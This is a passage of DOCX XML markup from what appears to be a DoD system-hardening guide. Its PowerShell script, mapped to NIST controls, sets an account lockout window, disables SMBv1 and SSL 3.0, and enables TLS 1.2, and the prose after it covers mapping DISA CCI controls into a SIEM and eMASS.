          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /lockoutwindow:</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># NIST Control: SC-8 / SC-13 | Disable Insecure, Legacy Protocols (SMBv1)</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write-Output</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[+] Disabling SMBv1 Protocol to prevent lateral exploitation..."</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Set-SmbServerConfiguration -EnableSMB1Protocol </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="78A960"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$false</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NIST Control: CM-6 / CM-7 | Restrict Network Boundary Management to Secure TLS</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -------------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write-Output</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[+] Restricting TLS Protocols (Enforcing TLS 1.2/1.3 baseline)..."</w:t>
      </w:r>
      <w:r w:rsidR="00D66D8A" w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="412EBF31" w14:textId="0B29B0E8" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Disable legacy SSL 3.0</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New-Item</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Path </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force | </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Out-Null</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New-ItemProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Path </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Name </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Enabled"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -PropertyType DWord -Force | </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Out-Null</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Enable TLS 1.2</w:t>
      </w:r>
      <w:r w:rsidR="00E96FF2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or TLS 1.3)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New-Item</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Path </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Force | </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Out-Null</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New-ItemProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Path </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Name </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Enabled"</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Value </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -PropertyType DWord -Force | </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Out-Null</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="397300"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Write-Output</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"[*] Baseline enforcement complete. Systems hardened to threat-informed requirements."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A496812" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRDefault="00D66D8A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AAEEAA1" w14:textId="77777777" w:rsidR="00B4067B" w:rsidRDefault="00B4067B" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150E0DF0" w14:textId="2C82A2DE" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Integrating the Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57397319" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To finalize this setup within an active DoD workspace:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B12BAD" w14:textId="77777777" w:rsidR="005D3438" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Map Controls Programmatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CF8A3" w14:textId="3D3F5BCA" w:rsidR="005D3438" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Download the official DISA CCI to NIST Control Mapping XML. Inject this data into your SIEM or configuration tools to automatically correlate system settings with eMASS fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BDE89" w14:textId="77777777" w:rsidR="005D3438" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
